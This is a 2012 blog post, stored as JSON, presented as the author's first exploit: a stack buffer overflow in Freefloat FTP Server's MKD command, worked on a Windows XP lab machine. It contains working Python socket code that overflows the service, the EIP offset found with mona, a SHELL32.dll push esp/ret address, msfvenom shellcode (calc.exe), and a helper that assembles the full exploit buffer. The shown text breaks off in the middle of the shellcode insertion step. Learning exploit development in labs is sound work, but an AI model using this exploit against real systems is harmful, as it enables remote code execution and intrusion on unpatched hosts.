{"id":807,"date":"2012-08-02T16:51:37","date_gmt":"2012-08-02T15:51:37","guid":{"rendered":"http:\/\/www.phillips321.co.uk\/?p=807"},"modified":"2012-08-30T12:44:11","modified_gmt":"2012-08-30T11:44:11","slug":"writing-my-first-exploit-freefloat-ftp","status":"publish","type":"post","link":"https:\/\/www.phillips321.co.uk\/2012\/08\/02\/writing-my-first-exploit-freefloat-ftp\/","title":{"rendered":"Writing my first exploit &#8211; Freefloat FTP"},"content":{"rendered":"<p>For a while now I&#8217;ve needed to learn how to exploit a service using things like NOP sleds. I decided to follow <a href=\"http:\/\/www.fuzzysecurity.com\/tutorials\/expDev\/2.html\" target=\"_blank\">this great tutorial<\/a> but wanted to make my own notes.<\/p>\n<p>First off you&#8217;ll need the following:<\/p>\n<ul>\n<li>Windows XP x86 SP3 machine<\/li>\n<li><a href=\"http:\/\/immunityinc.com\/products-immdbg.shtml\" target=\"_blank\">Immunity Debugger<\/a><\/li>\n<li><a href=\"http:\/\/redmine.corelan.be\/projects\/mona\/repository\" target=\"_blank\">mona.py<\/a> &#8211; place it inside the PyCommands folder of Immunity<\/li>\n<li><a href=\"http:\/\/www.freefloat.com\/sv\/freefloat-ftp-server\/freefloat-ftp-server.php\" target=\"_blank\">Freefloat FTP Server<\/a> &#8211; the target we will be attacking<\/li>\n<\/ul>\n<p>Background: the MKD command of the FTP server is vulnerable to a stack-based buffer overflow. An over-long directory name overwrites the saved return address, which gives us control of EIP, and we will use this command to exploit the service.<\/p>\n<p>The first thing to do is check that Freefloat FTP is working: load it up on the Windows XP machine and do a quick FTP connect to it. 
Now close FreeFloat FTP by clicking the unload button.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/freefloat.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/freefloat.jpg\" alt=\"\" title=\"freefloat\" width=\"216\" height=\"116\" class=\"aligncenter size-full wp-image-821\" \/><\/a><br \/>\nNow load Immunity Debugger and open the FreeFloat executable.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.open_.freefloat.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.open_.freefloat-150x150.jpg\" alt=\"\" title=\"i.open.freefloat\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-827\" \/><\/a><br \/>\nFreefloat will load into Immunity in a paused state. To run it, click the play button, choose Debug&#8211;>Run, or press F9.<\/p>\n<p>Now that FreeFloat FTP is running and accepting connections we will trigger the buffer overflow from an interactive Python session (the target machine is 192.168.0.71):<\/p>\n<div class=\"codecolorer-container python vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/><\/div><\/td><td><div class=\"python codecolorer\">Python 2.7.3 <span class=\"br0\">&#40;<\/span>default<span class=\"sy0\">,<\/span> Apr <span class=\"nu0\">20<\/span> <span class=\"nu0\">2012<\/span><span class=\"sy0\">,<\/span> <span class=\"nu0\">22<\/span>:<span class=\"nu0\">39<\/span>:<span class=\"nu0\">59<\/span><span class=\"br0\">&#41;<\/span> <br \/>\n<span class=\"br0\">&#91;<\/span>GCC 4.6.3<span class=\"br0\">&#93;<\/span> on linux2<br \/>\nType <span class=\"st0\">&quot;help&quot;<\/span><span 
class=\"sy0\">,<\/span> <span class=\"st0\">&quot;copyright&quot;<\/span><span class=\"sy0\">,<\/span> <span class=\"st0\">&quot;credits&quot;<\/span> <span class=\"kw1\">or<\/span> <span class=\"st0\">&quot;license&quot;<\/span> <span class=\"kw1\">for<\/span> more information.<br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> <span class=\"kw1\">import<\/span> <span class=\"kw3\">sys<\/span><span class=\"sy0\">,<\/span> <span class=\"kw3\">socket<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> evil <span class=\"sy0\">=<\/span> <span class=\"st0\">&quot;A&quot;<\/span>*<span class=\"nu0\">1000<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s<span class=\"sy0\">=<\/span><span class=\"kw3\">socket<\/span>.<span class=\"kw3\">socket<\/span><span class=\"br0\">&#40;<\/span><span class=\"kw3\">socket<\/span>.<span class=\"me1\">AF_INET<\/span><span class=\"sy0\">,<\/span><span class=\"kw3\">socket<\/span>.<span class=\"me1\">SOCK_STREAM<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> connect<span class=\"sy0\">=<\/span>s.<span class=\"me1\">connect<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'192.168.0.71'<\/span><span class=\"sy0\">,<\/span><span class=\"nu0\">21<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"st0\">'220 FreeFloat Ftp Server (Version 1.00).<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'USER anonymous<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span 
class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"nu0\">16<\/span><br \/>\n<span class=\"st0\">'220 FreeFloat Ftp Server (Version 1.00).<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'PASS anonymous<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"nu0\">16<\/span><br \/>\n<span class=\"st0\">'331 Password required for anonymous.<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'MKD '<\/span> + evil + <span class=\"st0\">'<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\n<span class=\"nu0\">1006<\/span><br \/>\n<span class=\"st0\">'230 User anonymous logged in.<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span> s.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'QUIT<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">close<\/span><br \/>\n<span class=\"nu0\">6<\/span><br \/>\n<span class=\"sy0\">&lt;<\/span>bound method _socketobject.<span class=\"me1\">close<\/span> of <span 
class=\"sy0\">&lt;<\/span><span class=\"kw3\">socket<\/span>._socketobject <span class=\"kw2\">object<\/span> at <span class=\"nu0\">0x1619360<\/span><span class=\"sy0\">&gt;&gt;<\/span><br \/>\n<span class=\"sy0\">&gt;&gt;&gt;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>This should cause Immunity Debugger to pause due to an access viloation due to trying to execute code at memory address 41414141(AAAA), this can be seen in the top right <i>EIP 41414141<\/i> It&#8217;s crucial to note that both ESP and EDI have been over written by our string of As as we&#8217;ll be setting the EIP (instruction pointer) to use one of these locations later.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.1.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.1-150x150.jpg\" alt=\"\" title=\"i.1\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-822\" \/><\/a><br \/>\nNow what we need to try and doing is figure out which of these&#8217;s 4 A&#8217;s wrote to the EIP location, we could try something like:<br \/>\naaaaAAAAAAAAAAAAAAAAAAAAAAAAAAA&#8230;. and then<br \/>\nAAAAaaaaAAAAAAAAAAAAAAAAAAAAAAA&#8230;&#8230; and so on but this would take ages. 
(upto 250 attempts)<\/p>\n<p>Step in mona and metasploit.<\/p>\n<p>The first thing we need to do is generate a string of length 1000 using metasploits pattern create tool to create a pattern that mona can use to find the exact locations within memory:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"text codecolorer\">\/msf3\/tools$ .\/pattern_create.rb 1000<br \/>\nAa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>We now need to use this string as the value passed for the directory to be created. 
Restart FreeFloat FTP inside Immunity Debugger with Ctrl+F2 followed by F9 (or Debug&#8211;>Restart followed by Debug&#8211;>Run), then send the pattern as the MKD argument:<\/p>\n<div class=\"codecolorer-container python vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/><\/div><\/td><td><div class=\"python codecolorer\">#!\/usr\/bin\/python<br \/>\n# Stage 2: send the 1000-byte Metasploit cyclic pattern as the MKD argument so mona can map EIP back to an offset<br \/>\nimport socket<br \/>\nimport sys<br \/>\n# output of pattern_create.rb 1000; every 4-byte window of it is unique<br \/>\nevil=&quot;Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B&quot;<br \/>\ns=socket.socket(socket.AF_INET,socket.SOCK_STREAM)<br \/>\nconnect=s.connect(('192.168.0.71',21))   # the Windows XP box running FreeFloat FTP<br \/>\ns.send('USER anonymous\\r\\n');s.recv(1024)<br \/>\ns.send('PASS anonymous\\r\\n');s.recv(1024)<br \/>\ns.send('MKD ' + evil + '\\r\\n');s.recv(1024)   # the vulnerable command; the service crashes here<br \/>\ns.send('QUIT\\r\\n');s.close()   # close() with parentheses, otherwise the socket is left open<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Running this code against FreeFloat FTP will once again crash the service. Now run <i>!mona findmsp<\/i> in the Immunity command bar. According to the mona documentation (https:\/\/community.rapid7.com\/community\/metasploit\/blog\/2011\/10\/11\/monasploit), findmsp will:<\/p>\n<ul>\n<li>look for the first 8 bytes of the cyclic pattern anywhere in process memory (normal or unicode expanded);<\/li>\n<li>look at all registers and list the registers that either point at or are overwritten with a part of the pattern. It will show the offset and the length of the pattern in memory after that offset in case the register points into the pattern;<\/li>\n<li>look for pointers into a part of the pattern on the stack (+ shows offset and length);<\/li>\n<li>look for artifacts of the pattern on the stack (+ shows offset and length);<\/li>\n<li>query the SEH chain and determine if it was overwritten with a cyclic pattern or not.<\/li>\n<\/ul>\n<p><a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.2.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.2-150x150.jpg\" alt=\"\" title=\"i.2\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-823\" \/><\/a><br \/>\nWhat we need to take from this is the following:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">EIP overwritten with normal pattern : 0x69413269 (offset 247)<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>0x69413269 is the little-endian reading of the bytes &quot;i2Ai&quot;, which sit 247 bytes into the pattern. So with the following buffer our four B&#8217;s land in EIP <i>(note: we&#8217;re still keeping the string length at 1000)<\/i>.<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">evil = &quot;A&quot;*247 + &quot;B&quot;*4 + &quot;C&quot;*749<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Restart FreeFloat FTP, send this buffer and go back to the CPU window (<b>c<\/b> or Alt+C).<\/p>\n<p>This time only BBBB (42424242) should be written into EIP:<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.3.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.3-150x150.jpg\" alt=\"\" title=\"i.3\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-824\" \/><\/a><br \/>\n(here I have issued the command <i>d esp<\/i> and then scrolled up a bit to see what I&#8217;ve injected)<\/p>\n<p>Instead of BBBB we can now supply a pointer to memory we control. ESP points into our buffer, so what we need is an instruction somewhere in the process that transfers execution to the address in ESP.<br \/>\nTo find one we use the Immunity command <i>!mona jmp -r esp<\/i><br \/>\nThis might take a second or two; once it&#8217;s complete, open the log window by clicking the <b>l<\/b> button (Alt+L) at the top of the screen.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.4.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.4-150x150.jpg\" alt=\"\" title=\"i.4\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-825\" \/><\/a><\/p>\n<p>We should now see a list of candidate addresses in several DLLs. Any of them will do for this tutorial, but all of those found here are Windows system DLLs, so the address is only valid for this exact OS build and service pack <i>(the DLLs are loaded at different addresses on other Windows versions or service packs; a DLL shipped with the application itself would give a more portable pointer if one were available)<\/i>.<\/p>\n<p>In this example we will use an address in SHELL32.dll to return into our injected code. Note the <i>push esp # ret<\/i>: it pushes the stack pointer and then returns to it, so execution continues at whatever ESP points at, which is our buffer. mona also reports ASLR: False and Rebase: False for the module, which is why the address is stable between runs:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">0x7c9c167d : push esp # &nbsp;ret &nbsp;| &nbsp;{PAGE_EXECUTE_READ} [SHELL32.dll] ASLR: False, Rebase: False, SafeSEH: True, OS: True, v6.00.2900.5512 (C:\\WINDOWS\\system32\\SHELL32.dll)<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>We can try our exploit again with the following value in place of BBBB:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/><\/div><\/td><td><div class=\"text codecolorer\">evil = &quot;A&quot;*247 + &quot;\\x7D\\x16\\x9C\\x7C&quot; + &quot;C&quot;*749<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><i>Note: the address is written in reverse byte order because the CPU is little-endian: 0x7c9c167d is stored in memory as the bytes 7D 16 9C 7C. We also keep the string length at 1000 so the crash behaves exactly as it did when we measured the offset.<\/i><br \/>\nRestart FreeFloat FTP and send the new string with the pointer in place.<br \/>\n<a href=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.5.jpg\"><img loading=\"lazy\" src=\"http:\/\/www.phillips321.co.uk\/wp-content\/uploads\/2012\/08\/i.5-150x150.jpg\" alt=\"\" title=\"i.5\" width=\"150\" height=\"150\" class=\"aligncenter size-thumbnail wp-image-826\" \/><\/a><\/p>\n<p>Now all we need to do is generate some shellcode and add it to the string. We will generate it with msfvenom, making sure that none of the bad characters appear in the output. 
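<\/p>\n<p>The offset derivation and the buffer assembly above, as an added Python 3 example that is not part of the original post: it regenerates the Metasploit cyclic pattern, maps the EIP value mona reported (0x69413269) back to offset 247 the way findmsp does, and lays out the MKD argument around the push esp # ret address in little-endian order while keeping the 1000-byte length and refusing any bad character. The return address and the bad-character list (\\x00, \\x0A, \\x0D) are the ones used on this page; the eight-byte int3 stand-in for the shellcode is constructed for the demo, and the real msfvenom output plugs in unchanged.<\/p>\n
```python
import struct

# Values taken from the post: the EIP value !mona findmsp reported, and the
# push esp # ret address mona found in SHELL32.dll on that XP SP3 build.
EIP_FROM_MONA = 0x69413269
PUSH_ESP_RET = 0x7c9c167d
# Bad characters the post works with: NUL ends the string, CR and LF end the FTP command line.
BAD_CHARS = bytes([0x00, 0x0a, 0x0d])
CRLF = bytes([0x0d, 0x0a])
NOP = bytes([0x90])


def pattern_create(length):
    '''Rebuild the Metasploit pattern_create.rb output (Aa0Aa1...Az9Ba0...).
    Each 3-byte chunk is unique, so any 4-byte window maps back to exactly one offset.'''
    out = bytearray()
    for upper in b'ABCDEFGHIJKLMNOPQRSTUVWXYZ':
        for lower in b'abcdefghijklmnopqrstuvwxyz':
            for digit in b'0123456789':
                out += bytes([upper, lower, digit])
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(pattern, register_value):
    '''What findmsp does for a register: pack the crash value little-endian and look
    for those four bytes in the pattern. Returns the offset, or None if absent.'''
    needle = struct.pack('<I', register_value)
    offset = pattern.find(needle)
    if offset < 0:
        # a reversed hit would mean the bytes were consumed big-endian; cheap to check
        offset = pattern.find(needle[::-1])
    return offset if offset >= 0 else None


def check_bad_chars(blob, bad=BAD_CHARS):
    '''Return the set of forbidden byte values present in blob (empty means clean).'''
    return {b for b in blob if b in bad}


def build_evil(offset, ret_addr, shellcode, total=1000, nops=30):
    '''Lay out: offset bytes of A, the return address in little-endian order, a NOP sled,
    the shellcode, then C padding so the MKD argument keeps the measured total length.'''
    ret = struct.pack('<I', ret_addr)          # 0x7c9c167d goes on the wire as 7d 16 9c 7c
    stage = NOP * nops + shellcode             # ESP lands on the sled and slides into the code
    dirty = check_bad_chars(ret + stage)
    if dirty:
        raise ValueError('bad characters in payload: %s' % (sorted(dirty),))
    pad = total - offset - len(ret) - len(stage)
    if pad < 0:
        raise ValueError('payload does not fit in %d bytes' % total)
    evil = b'A' * offset + ret + stage + b'C' * pad
    assert len(evil) == total
    return evil


def mkd_command(evil):
    '''The exact bytes the exploit writes to the socket for the vulnerable command.'''
    return b'MKD ' + evil + CRLF


if __name__ == '__main__':
    pat = pattern_create(1000)
    print('EIP offset:', pattern_offset(pat, EIP_FROM_MONA))   # 247, as mona reported
    # Constructed stand-in for shellcode (eight int3 breakpoints), not the msfvenom payload
    demo_shellcode = bytes([0xcc]) * 8
    evil = build_evil(247, PUSH_ESP_RET, demo_shellcode)
    print(len(evil), evil[247:251].hex())   # 1000 7d169c7c
```
<p>Run it directly to print the offset and the four pointer bytes. Every result comes back from a function rather than only being printed, so the layout (pointer at 247, sled at 251, shellcode at 281, padding to exactly 1000 bytes) and the bad-character rejection can be checked before anything is sent to the target.<\/p>\n<p>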
This tutorial will not cover identifying the bad characters; for now just accept them to be <i>\\x00 \\x0A \\x0D<\/i> (\\x00 is a string terminator and \\x0A and \\x0D end the FTP command line, so none of the three may appear anywhere in the buffer, the return address and the shellcode included):<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/><\/div><\/td><td><div class=\"text codecolorer\">\/msf3$ .\/msfvenom -p windows\/exec CMD=calc.exe -b '\\x00\\x0A\\x0D' -f c<br \/>\n[*] x86\/shikata_ga_nai succeeded with size 227 (iteration=1)<br \/>\nunsigned char buf[] = <br \/>\n&quot;\\xbf\\xcd\\x19\\x02\\x91\\xd9\\xea\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1&quot;<br \/>\n&quot;\\x33\\x31\\x7e\\x12\\x03\\x7e\\x12\\x83\\x0b\\x1d\\xe0\\x64\\x6f\\xf6\\x6d&quot;<br \/>\n&quot;\\x86\\x8f\\x07\\x0e\\x0e\\x6a\\x36\\x1c\\x74\\xff\\x6b\\x90\\xfe\\xad\\x87&quot;<br \/>\n&quot;\\x5b\\x52\\x45\\x13\\x29\\x7b\\x6a\\x94\\x84\\x5d\\x45\\x25\\x29\\x62\\x09&quot;<br \/>\n&quot;\\xe5\\x2b\\x1e\\x53\\x3a\\x8c\\x1f\\x9c\\x4f\\xcd\\x58\\xc0\\xa0\\x9f\\x31&quot;<br \/>\n&quot;\\x8f\\x13\\x30\\x35\\xcd\\xaf\\x31\\x99\\x5a\\x8f\\x49\\x9c\\x9c\\x64\\xe0&quot;<br \/>\n&quot;\\x9f\\xcc\\xd5\\x7f\\xd7\\xf4\\x5e\\x27\\xc8\\x05\\xb2\\x3b\\x34\\x4c\\xbf&quot;<br \/>\n&quot;\\x88\\xce\\x4f\\x69\\xc1\\x2f\\x7e\\x55\\x8e\\x11\\x4f\\x58\\xce\\x56\\x77&quot;<br \/>\n&quot;\\x83\\xa5\\xac\\x84\\x3e\\xbe\\x76\\xf7\\xe4\\x4b\\x6b\\x5f\\x6e\\xeb\\x4f&quot;<br \/>\n&quot;\\x5e\\xa3\\x6a\\x1b\\x6c\\x08\\xf8\\x43\\x70\\x8f\\x2d\\xf8\\x8c\\x04\\xd0&quot;<br \/>\n&quot;\\x2f\\x05\\x5e\\xf7\\xeb\\x4e\\x04\\x96\\xaa\\x2a\\xeb\\xa7\\xad\\x92\\x54&quot;<br \/>\n&quot;\\x02\\xa5\\x30\\x80\\x34\\xe4\\x5e\\x57\\xb4\\x92\\x27\\x57\\xc6\\x9c\\x07&quot;<br \/>\n&quot;\\x30\\xf7\\x17\\xc8\\x47\\x08\\xf2\\xad\\xb8\\x42\\x5f\\x87\\x50\\x0b\\x35&quot;<br \/>\n&quot;\\x9a\\x3c\\xac\\xe3\\xd8\\x38\\x2f\\x06\\xa0\\xbe\\x2f\\x63\\xa5\\xfb\\xf7&quot;<br \/>\n&quot;\\x9f\\xd7\\x94\\x9d\\x9f\\x44\\x94\\xb7\\xc3\\x0b\\x06\\x5b\\x2a\\xae\\xae&quot;<br \/>\n&quot;\\xfe\\x32&quot;;<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>Now we need to insert this code into the string while making sure it still remains 1000 characters long:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/><\/div><\/td><td><div class=\"text codecolorer\">shellcode = (&quot;\\xbf\\xcd\\x19\\x02\\x91\\xd9\\xea\\xd9\\x74\\x24\\xf4\\x5e\\x31\\xc9\\xb1&quot;<br \/>\n&quot;\\x33\\x31\\x7e\\x12\\x03\\x7e\\x12\\x83\\x0b\\x1d\\xe0\\x64\\x6f\\xf6\\x6d&quot;<br \/>\n&quot;\\x86\\x8f\\x07\\x0e\\x0e\\x6a\\x36\\x1c\\x74\\xff\\x6b\\x90\\xfe\\xad\\x87&quot;<br 